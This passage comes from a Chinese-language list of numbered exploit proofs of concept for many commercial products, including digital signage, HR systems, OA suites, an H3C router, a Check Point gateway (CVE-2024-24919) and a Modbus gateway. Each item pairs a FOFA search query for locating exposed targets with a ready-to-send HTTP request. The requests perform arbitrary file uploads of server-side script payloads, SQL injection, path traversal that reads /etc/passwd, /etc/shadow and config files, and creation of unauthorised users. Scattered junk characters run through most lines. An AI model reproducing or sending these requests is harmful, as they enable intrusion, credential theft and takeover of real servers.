% n) i8 u& s: I* AConnection: close' q- F/ @% X" ]( a3 J: a
Content-Length: 4459 H$ U8 g% z8 V: Q# Z6 |
Content-Type: text/xml5 V6 {( z6 Z* F4 Q
Accept-Encoding: gzip4 _" U, I" \2 z7 U% D2 X9 T# c

! i9 x0 R+ {; J# @5 c4 m/ T<?xml version="1.0" encoding="utf-8"?>
! P$ Q( `* \2 B. C: C<soap:Envelope xmlns:xsi=": ^) k# _" {0 @; Z% ]6 P! B
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
3 p1 |; Z- q" @" e; {xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
2 l& d, [- v; z; E<soap:Body>4 N! h) b$ a; [( u
<UploadResume xmlns="http://tempuri.org/">2 }) T7 @) w, @1 X6 c. I
<ip>1</ip>
' _9 g7 {6 B: R, M( }<fileName>../../../../dizxdell.aspx</fileName>: v# f9 J% f- |! Z. B: N
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>4 r3 _, o+ _6 F0 G$ X5 v% f3 V
<tag>3</tag>( M$ o$ X1 g" n8 {& q
</UploadResume>8 I8 |& h$ v& ]' I" a( C! ?# P' `
</soap:Body>' Y( A: g6 F* k- e% @
</soap:Envelope>2 [& @6 z9 q, v1 E
8 Q: t' @& |' c4 E8 [3 q# Z
# W0 y1 c& O0 r5 `) [+ w
http://x.x.x.x/dizxdell.aspx
: n1 b- P. q& W! m" k/ X$ \! k9 H1 q1 z. F2 P- X, C7 H
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
8 m% [3 V* I( x" d! n4 @FOFA: app="和丰山海-数字标牌": l! u/ u% l( |9 v* R! c: `8 [+ K
POST /QH.aspx HTTP/1.1
' U+ K$ y. P/ u1 z" Q) Z. `Host: x.x.x.x
2 k) @" v, z. y$ `& y$ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.05 U" B& f8 t* g& r+ ~" ~
Connection: close# p4 r. D" p, i% p
Content-Length: 583! Q% Y( R8 `* V
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey5 [: o0 R  y) L9 A. I' e
Accept-Encoding: gzip- J! z- {- v# v. n. @0 _0 E
8 \. u! j/ s" W; a
------WebKitFormBoundaryeegvclmyurlotuey% s0 J0 I2 i/ @6 E. X8 t
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"% P0 N" y; `( x
Content-Type: application/octet-stream
* z6 Z: B" J# D* o+ e% k: d( O0 Q; r% F
<% response.write("ujidwqfuuqjalgkvrpqy") %>
) s: }! z3 H3 F* h4 ^: `------WebKitFormBoundaryeegvclmyurlotuey
1 Z" m" X8 Y3 a% oContent-Disposition: form-data; name="action"
% U2 x) [1 r" R, @- b7 C9 S  Z0 P, a5 n  x
upload
9 l1 V5 x! F& C. J4 |+ c1 o------WebKitFormBoundaryeegvclmyurlotuey' x6 }" O* L4 s- I  B
Content-Disposition: form-data; name="responderId"
& ^4 j9 Y5 d; x1 K7 I, C
- s3 Z+ S! m0 P1 L* m; WResourceNewResponder
; m5 d+ E, u1 l$ A: a3 \------WebKitFormBoundaryeegvclmyurlotuey! P% I+ {) p- \3 }" ?* v
Content-Disposition: form-data; name="remotePath"; h/ B3 y  P: M( Y4 r4 K

; o3 D- o, p. K+ B/opt/resources9 {1 b& n2 _! s/ a
------WebKitFormBoundaryeegvclmyurlotuey--: W5 a7 M9 x- n, M+ `* k
- a4 d% A- r7 @& Z. m
0 ^; N6 z' h& T+ K
http://x.x.x.x/opt/resources/kjuhitjgk.aspx! [  m5 u0 M7 S5 ^6 P

8 q- I& |0 }- ^! U! U, y; B163. 号卡极团分销管理系统 ue_serve.php 任意文件上传- t' q1 ]" g4 u1 p) u3 a
FOFA: icon_hash="-795291075"
$ ~6 S3 Y$ ], R0 {, y! ePOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.10 w8 @# p3 `# i; T- i0 R" l
Host: x.x.x.x; ^: ?' f. N. O" ]6 I! }# Y; N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.360 g& n& u5 {4 _5 {/ ~
Connection: close" z7 V9 `& c- U0 S6 S
Content-Length: 293
5 T( m) l3 t( ?3 B+ eAccept: */*; q% q; f' R2 Q& w- ], R9 I: K
Accept-Encoding: gzip, deflate. v; V' V& i* v( s5 b2 l2 f
Accept-Language: zh-CN,zh;q=0.9
9 @4 Q/ J7 n( J5 ~Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
, k+ S0 i8 l2 M) a4 H
: W! e, S$ Z+ R( w1 ]------iiqvnofupvhdyrcoqyuujyetjvqgocod: n' {5 H4 A0 w* [* {9 G' s
Content-Disposition: form-data; name="name"6 _; M6 I% U- v4 o, ?; |+ ]

. S* y2 A1 X0 {% r  E' i1.php4 u7 F2 H# F/ O6 m9 `: H
------iiqvnofupvhdyrcoqyuujyetjvqgocod1 w! J; Z8 J2 G) ^
Content-Disposition: form-data; name="upfile"; filename="1.php") }- s, A" u/ V  {/ _3 Q+ }
Content-Type: image/jpeg2 p/ `7 `$ d3 B+ J- O- k) ^
4 H& F& Q) V, q4 {' ]
rvjhvbhwwuooyiioxega6 f0 i$ K2 u6 \3 b6 [
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
; W2 A  Q3 _6 Z: x, p9 a, p0 T, [5 ^
, J  v" i' S. `" E: j
5 O) T/ R/ g4 Y1 w2 j164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传* s) ^5 r& \5 d
FOFA: title="智慧综合管理平台登入"
$ ~) H$ ~" R9 qPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1- L4 y4 ~* C7 Y0 x# a
Host: x.x.x.x
* g* x) A  ^! {0 s4 S0 x, WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
+ v2 M# O2 o. O3 E9 _- kContent-Length: 288' R5 S4 F6 S. A$ p
Accept: application/json, text/javascript, */*; q=0.01* A' ?9 R) @, x+ S0 l- L: c" A. w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
' c0 |- }7 }) z2 \% DConnection: close( Y7 L/ |2 p/ ]& N: ^6 g
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
4 P! C1 m$ F: n; H4 [1 x6 p. uX-Requested-With: XMLHttpRequest0 {7 Y9 q2 v- ?5 K7 B) S
Accept-Encoding: gzip
# g# P" F, h8 {6 e
1 J5 N8 O2 e9 N6 ^& x------dqdaieopnozbkapjacdbdthlvtlyl
) I& Q, O7 y  R5 ZContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
* J+ ]: _- m/ U/ [$ S/ s6 ^Content-Type: image/jpeg" e( d: M& a1 Z( p

$ I1 J, l3 @1 S1 Q  T8 Z<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>; z% u8 X7 V! V) R* O3 m$ L, f
------dqdaieopnozbkapjacdbdthlvtlyl--
% i* s7 j6 c1 N$ f4 y" l7 x) J" i7 F
! @. ~# y7 r2 X! V: J5 @2 e# D
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
/ E# G& u# [. e/ R4 q& A9 Q3 u$ e; S
165. OrangeHRM 3.3.3 SQL 注入( ~) i) h, M: ?3 i
CVE-2024-36428
+ o& [8 j5 h2 M0 I1 Y7 c0 HFOFA: app="OrangeHRM-产品"  {: n3 w' o3 p; @8 b' k
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
) S; ~& y9 ?9 R) t+ a# [8 L  S) V- Z3 V' q8 G

$ y; E( _$ g& y& ^) @  z. _166. 中成科信票务管理平台SeatMapHandler SQL注入- Q, c4 Z9 O6 R3 q% ~+ [) }" b+ u
FOFA：body="技术支持：北京中成科信科技发展有限公司"$ F+ G% r% w6 R2 k+ q
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
$ r6 O. ^/ s5 C8 _/ ~" lHost:1 g3 b- l1 Z/ u# m
Pragma: no-cache
: O- B5 }6 f" f7 X) j5 tCache-Control: no-cache
3 I& _$ j0 O2 w% p) B  OUpgrade-Insecure-Requests: 10 c& }3 o, m8 {4 l# k2 w/ `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
, p6 j5 O4 c4 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 B8 w0 K* g6 I3 C
Accept-Encoding: gzip, deflate# @& @+ t7 q) i5 y; u3 d
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8! _, ~" X6 J& D! k  J
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
7 [1 B4 j) j% Z- o7 G6 OConnection: close8 W2 I2 _4 z& E2 S
Content-Type: application/x-www-form-urlencoded6 k; [) Q1 M- T7 J% V$ g* K
Content-Length: 89
5 z( O& r. K1 p( G) x6 ]$ {' e8 Y$ e, I
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE) I" x- S6 T  ]) q2 R, U1 ]2 i
% u! z( y6 L0 k' H

& N8 u2 d" t" V167. 精益价值管理系统 DownLoad.aspx任意文件读取
& f! R" n: z& N$ rFOFA：body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"1 e9 {0 o) k7 a6 ]+ m- v4 K% s, o7 @
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1/ ~. t0 s: g- p$ S9 O
Host:
0 l! j$ G4 `  a) D+ D( pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- ?6 d. q2 \/ l+ [4 T# B
Content-Type: application/x-www-form-urlencoded
$ T; R  ]- R8 }. n% l) sAccept-Encoding: gzip, deflate
# J2 l, }  b5 ~$ _- DAccept: */*! j! K' ~8 s( F0 q8 F8 ^$ I
Connection: keep-alive
7 j; `* Q7 ?* |
4 W- k) y7 Q* I4 m+ H
9 ?: P4 g9 A& L( ~' L5 y* x1 v168. 宏景EHR OutputCode 任意文件读取  k# F4 L) D8 W0 y9 E
FOFA：app="HJSOFT-HCM"
4 \, r# V/ \% y; NGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.15 K  y9 ^) \  w+ I! ], N% J
Host: your-ip9 \6 i% g. Q1 b7 y  ?6 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
( a. x+ E, h8 N  ~0 P5 b- z8 hContent-Type: application/x-www-form-urlencoded% t+ D7 ^. Z* |
Connection: close
! D+ s  o3 L* \+ H/ {+ ~, C: D4 p2 H% @" ]. D
8 }( G; e* T6 d6 j( b8 s! O/ H

9 I5 `. \5 J' M5 J169. 宏景EHR downlawbase SQL注入% v7 O/ k1 Y: Y3 B) ^5 J/ A
FOFA：app="HJSOFT-HCM"
( [" D; Y* ^$ y' V, T: H& e5 o, vGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1, p1 r, J  q  u8 `7 X7 A) d' _$ P
Host: your-ip4 z0 U: A$ I- W, D, U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" U- o* Q" o& _: L6 i
Accept: */*
! R6 v( ^- k/ ~5 b# K5 Q0 gAccept-Encoding: gzip, deflate* N# q8 p- B3 O5 n2 }( |
Connection: close" A! B) R" ~! |9 f
& ~: M; X( k8 o0 Y, m+ V

6 T* E0 ]; z* }& {7 \0 H0 G7 P! h( H
/ f# G* X9 W8 @( x& U4 I170. 宏景EHR DisplayExcelCustomReport 任意文件读取; p2 S, Z; p' H0 s
FOFA：body="/general/sys/hjaxmanage.js"
7 h& W/ G- R# yPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1/ L/ Y+ j, o' L  K
Host: balalanengliang
: r4 I+ T: g+ ]' t  gUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 m6 Q. c- m4 X/ jContent-Type: application/x-www-form-urlencoded
- n9 ]) ~7 s" `9 d
2 x0 K  R* @; v/ dfilename=../webapps/ROOT/WEB-INF/web.xml
% g8 I3 v' y3 ]* E7 r
: g9 T1 |. |3 D
7 E, L7 d( U+ k7 d" b171. 通天星CMSV6车载定位监控平台 SQL注入
. F6 p- V) N6 y* M4 lFOFA：body="/808gps/"
3 w* V3 j. ?& Z' l: PGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
& b7 c& q! O! s7 h2 _% hHost: your-ip
4 o* h- |4 }8 J5 Q( k4 bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
' J7 x3 h' u  W2 qAccept: */*- V: ^7 G- ]! w& |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) p* F3 O- [9 {Accept-Encoding: gzip, deflate; y- E: s" c+ E6 a4 S1 h2 m
Connection: close1 H. J1 j8 m0 K" u

8 a" @4 A* X' [6 n8 T: T! n1 U$ Y8 \9 @( O3 i
4 \1 ?1 \1 d6 ^9 L7 ]1 b! u
172. DT-高清车牌识别摄像机任意文件读取
6 T, }# r' O/ }FOFA：app="DT-高清车牌识别摄像机"
. P6 f! ?2 N6 o& ~4 kGET /../../../../etc/passwd HTTP/1.1
( Z4 n1 v4 Q$ Q% ?* {: NHost: your-ip
2 X: f2 O& p& eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ @- n8 S9 k7 B- ]( qAccept-Encoding: gzip, deflate  @- p* V. e' d9 T2 n: W
Accept: */*
0 h4 }; V; D6 n: C9 i5 mConnection: keep-alive$ d7 R/ T% D/ G/ b+ \' n

' J2 K) c) f8 ^1 A2 S9 d1 x9 j2 X( @! D
3 N7 u# _% ^( ?. m
173. Check Point 安全网关任意文件读取
. b( S1 ^' L6 v. qCVE-2024-24919* d1 Z1 d+ p/ s
FOFA：app="Check_Point-SSL-Network-Extender"4 ~  J; |- i2 l0 R1 k) z4 y
POST /clients/MyCRL HTTP/1.1
( l, j0 j; w' N5 L  M: |0 V  l  |Host: your-ip
- M; h7 d* W3 F5 y+ J. ^Content-Type: application/x-www-form-urlencoded4 J+ w8 E4 M8 [( O& |
3 S  o, o) L6 h; x3 y1 h
aCSHELL/../../../../../../../etc/shadow
# r" x) q- J* M$ A' U8 m4 L" q7 s5 ?4 ~) G) ~8 l$ c

! z% r! v* r% N% v) A" P, _: w/ a2 @5 X8 s
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
! Z, F% n- J( `4 ]' mFOFA：app="金和网络-金和OA"
* B0 U: M7 I1 T4 j) N4 U5 s! K0 nGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.10 `, C  g' C: E- \, r& I
Host: your-ip" A7 D( m7 G- f& m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
% I6 w2 S, b0 [: F* VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. |3 V6 s" ~: B1 Y
Accept-Encoding: gzip, deflate, br4 v+ g* n4 J, l- l
Accept-Language: zh-CN,zh;q=0.93 W8 N! o3 B, w
Connection: close$ i* n' }" V1 b& V2 G
) ]! k3 \; H1 Q* A5 e" u
7 K+ v  _6 }$ i: s0 K# |
" M2 d7 |, N3 v! |
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入# S6 l1 ]9 V6 C2 L4 t
FOFA：app="金和网络-金和OA"- P' W  h; s3 v" o( V% v$ V, W
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
$ c. A3 ^% q' ?1 h: ~9 D; eHost:
% P! b" }- l9 v3 [7 D( NUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
7 S8 K' A/ Y4 N# ^6 m% nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' I# h4 p9 }) t' s% `: X9 vAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 e: S" L. o8 m0 A% nAccept-Encoding: gzip, deflate
. O3 K' f5 a1 q/ c  ~" Y9 @Connection: close, R- h/ ^& L; n( l% u) Z1 K
Upgrade-Insecure-Requests: 14 W; I0 p8 e* r
5 V4 `3 z! N* A& l0 E* r% U

6 g2 k  v4 F/ x7 O176. 电信网关配置管理系统 rewrite.php 文件上传7 s% q7 I$ r% R, \& m, _
FOFA：body="img/login_bg3.png" && body="系统登录"9 [$ G7 {6 L, o6 @  m+ X( _
POST /manager/teletext/material/rewrite.php HTTP/1.1
* ^) Z, _; ?# Q/ x6 _Host: your-ip
: M7 J7 u$ S- t; UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0+ [& p5 ~$ I4 h9 ]  T" e
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT" R: I1 H# n# ~1 N4 [- s
Connection: close
5 T  N' T* ]' i: m4 F" W) t* O: [0 H/ }
------WebKitFormBoundaryOKldnDPT$ a# ]. y+ E$ x  s
Content-Disposition: form-data; name="tmp_name"; filename="test.php". s% F, W1 w9 a+ r" C2 X
Content-Type: image/png
% A) H. T1 ]/ t; R6 p1 m
7 r# s/ X9 m; b: E5 L4 ~& o<?php system("cat /etc/passwd");unlink(__FILE__);?>
' B8 V3 C+ P$ L* K& h------WebKitFormBoundaryOKldnDPT
" @" D. {: A, F% V4 UContent-Disposition: form-data; name="uploadtime"; Q, ]* D/ N6 {: C% c' C
9 c. O* Q2 g7 J1 }, r  y
/ r0 u: f$ ^1 o) ]$ [; M
------WebKitFormBoundaryOKldnDPT--
: K0 m' e+ u: u2 z: w6 V  \2 y7 x, `) i4 `

! h4 O3 a( L4 |1 B2 x. f) m' E8 f- T: p, U& o
177. H3C路由器敏感信息泄露
& F! O3 |2 X$ S% R! h& w; U2 k/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg: f2 l3 b3 j% G/ F9 P8 s
/userLogin.asp/../actionpolicy_status/../M60.cfg$ [; w$ F# p( f: W
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
- a( z9 H7 J9 h$ X8 `: v. `) ^/userLogin.asp/../actionpolicy_status/../GR5200.cfg
7 i/ g1 U% g; |/userLogin.asp/../actionpolicy_status/../GR3200.cfg
8 u' U$ [8 A# y+ z' F# f) F/userLogin.asp/../actionpolicy_status/../GR2200.cfg
. K' ?  t9 X7 X1 Z- M/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg$ ^, {# K* ^  j
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
' ^$ Y" z4 ^! Z8 t8 u/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
" z& o  S" i2 H& I& ^; [/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg* _* u1 b& \6 R/ K
/userLogin.asp/../actionpolicy_status/../ER5200.cfg5 b5 {- Y6 g8 }! t+ z# P8 F& D5 c. ~
/userLogin.asp/../actionpolicy_status/../ER5100.cfg+ }* o5 Y5 W2 H+ L+ r
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
2 R. @" `1 L; e5 d- L# o8 b. A/userLogin.asp/../actionpolicy_status/../ER3260.cfg/ l; l' {. h5 j9 ]
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg1 S+ W1 `( `2 j. R8 Z, O
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
( r9 k; [  f% D( }6 n1 y4 G/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
) h7 _- I, Z7 o. \/ `6 u0 p( z, s/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
' f' A# H$ D5 g# V( i. u/ K, g: ^/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
% G! [  S9 `1 L! z/userLogin.asp/../actionpolicy_status/../ER3100.cfg
" ~  C$ k8 s! S, q  S; D, ]/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
" E3 y* ]! o( g
$ W6 f) `' K/ b; V) _  i0 \% o! `& J* }% \( u* _
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
9 ]) d2 Y6 L" h% \& F6 J! kFOFA：header="/selfservice". j4 p2 V3 S( W0 h6 W( ?
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1% C! j# I; p9 ]" A
Host:
, N# F8 s$ H2 C  @' s# {+ u& A+ mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36. g  P- n( [+ a6 e$ b
Content-Length: 2521 Z& s# u# w& Q' U: y, Z- \2 U
Accept-Encoding: gzip, deflate& R, W; F; T  [. j) y8 ^8 P  _
Connection: close
" v1 a. b  l. ^* \% {Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
# P3 u& O; {7 x-----------------aqutkea7vvanpqy3rh2l
7 q4 m" j* N" PContent-Disposition: form-data; name="12234.txt"; filename="12234"- |; u& t2 H6 s9 r1 n! U: R, {
Content-Type: application/octet-stream
! v3 c4 s( V: H  {% E# P1 I6 kContent-Length: 255
5 H0 O" o0 Y% I5 _0 y5 G/ O) o, Y; e0 f; u
12234
: b: ]! H! u' a7 |-----------------aqutkea7vvanpqy3rh2l--
1 V; D) |" v. U& m/ ~% W$ a8 H  R8 q  @# z6 C+ w4 L

4 k. z- d9 K; u. v9 Z- k& e1 F' DGET /imc/primepush/%2e%2e/flex/12234.txt
. y! Y! S! |! V0 k5 y' I. k& \$ W  E. K+ ]
! j% t* w; h& E
179. 建文工程管理系统存在任意文件读取. Z7 v  C" H. h" C
POST /Common/DownLoad2.aspx HTTP/1.1& e" c3 M" a9 A7 L5 ?& y$ B( @
Host: {{Hostname}}5 z! A6 \2 F/ o+ _6 q8 r% I1 L8 K
Content-Type: application/x-www-form-urlencoded6 ?) r+ E) }- T8 x6 i6 L
User-Agent: Mozilla/5.0( o% w! K1 a8 v0 `2 g& g

  o% u/ X! t' G5 h/ m3 Rpath=../log4net.config&Name=
1 Z% n" q  U! U' w8 D2 F5 H0 L
% F- d5 \3 c, B2 f; @8 C# _
! N! o7 R/ S; a) m& V  e/ x- i180. 帮管客 CRM jiliyu SQL注入
0 K  T. ]2 R- h. H- a2 z& NFOFA：app="帮管客-CRM"" m* d. ^9 p6 ?/ p6 L  R  @
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
. s6 U( S* w1 IHost: your-ip) y) Q* P1 X9 Y$ U0 F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
. \7 G! z  N8 F1 W8 w7 vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 H1 [  }7 R: j: ^
Accept-Encoding: gzip, deflate
5 e# n% ]) J/ L# x' fAccept-Language: zh-CN,zh;q=0.9
' Z& P4 }* j! v9 J' t: A& aConnection: close
( d& \2 }* ~, E6 L+ l
$ [! C( v& H; U  x  z9 L
1 K! ~  v" a# Y0 W" P8 d181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入* }8 d. a' C+ |& j! n
FOFA："PDCA/js/_publicCom.js"6 V" P6 f7 X" D5 i( Q% q
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
  h1 _) g) V8 p0 x! n& k7 M% ^Host: your-ip8 D# @8 I% G3 h& }) o8 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
3 U' n1 F0 l& @7 j9 ^+ CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 A4 O$ [) C" S* I! K+ k8 X$ iAccept-Encoding: gzip, deflate, br, f& P+ a5 e, _# S' ~1 W! b+ E
Accept-Language: zh-CN,zh;q=0.9
; _# E, J& N/ {$ [  `% JConnection: close
- d; h/ x& H/ f1 t, k- }4 B/ I+ QContent-Type: application/x-www-form-urlencoded" A* D; {2 K  ]2 U4 F
9 `9 U% ~7 J/ I
, Q! Q1 w" ?" \; ^, |' A- R  I
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
; t2 T4 K6 p8 x3 A7 s# ]
5 R" U& b! O: J- t3 T8 e* f6 u% b) J4 s/ C
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建% h# T( b/ l6 m8 p7 y
FOFA："PDCA/js/_publicCom.js"
9 ~/ s4 @: c( ?0 Y1 fPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
% C' Z- O6 x6 H! a6 n% FHost: your-ip
- F) s; X$ v/ F1 s- Z0 \  r6 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
9 @4 h/ R- w3 ~" ^; aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" K, x& X9 B+ o$ S- t  N* b
Accept-Encoding: gzip, deflate, br) j+ }: q3 R$ U; r; K3 @4 `
Accept-Language: zh-CN,zh;q=0.9
' _, T" M: f8 y9 V  v+ [Connection: close5 w0 P2 V' ?  d
Content-Type: application/x-www-form-urlencoded* X3 l- P2 r5 ~+ P# W5 ?, D
$ `" I) w( B) b$ a
4 U2 r1 @( a/ L8 \% _
username=test1234&pwd=test1234&savedays=16 T/ S8 Z9 P0 @( s. u
3 d, R' u) k+ g7 E, Z: \# T
$ E/ m" F: Q* V% r
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
. |# e5 R- u8 l0 u7 Z: GFOFA：body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
6 C$ T8 I0 [( `  o- ?! ^GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
2 w3 I% Q/ a9 m/ iHost: your-ip
; M7 S5 a. k  d: NUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36& `7 u! B. g( ?, ^' k" P+ Y% \+ }/ `
Accept-Charset: utf-8
+ G3 p$ ?* D) U' d! cAccept-Encoding: gzip, deflate
4 [& [, _! m- }4 P4 w7 SConnection: close
# |5 ]! n5 u+ ^1 g/ x' y0 H7 R
, ]* \+ I7 n0 Z/ g8 [
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
8 I3 d( B" u  W- y% Y) bFOFA：server="SunFull-Webs"& z: j: f' F  f' ]6 q$ s8 b, m% p- m
POST /soap/AddUser HTTP/1.14 c+ h: P& R) c
Host: your-ip
2 r& ?: D7 X: r% `2 D% Y+ eAccept-Encoding: gzip, deflate
" _4 ~* X2 q! F7 d( i% VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
3 {( C: I, J6 Q) V/ G/ m; L7 aAccept: application/xml, text/xml, */*; q=0.01
3 ]3 L7 k; }) sContent-Type: text/xml; charset=utf-8) C1 u2 ]# e$ \% s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& U$ v6 a$ h) Y* f6 F
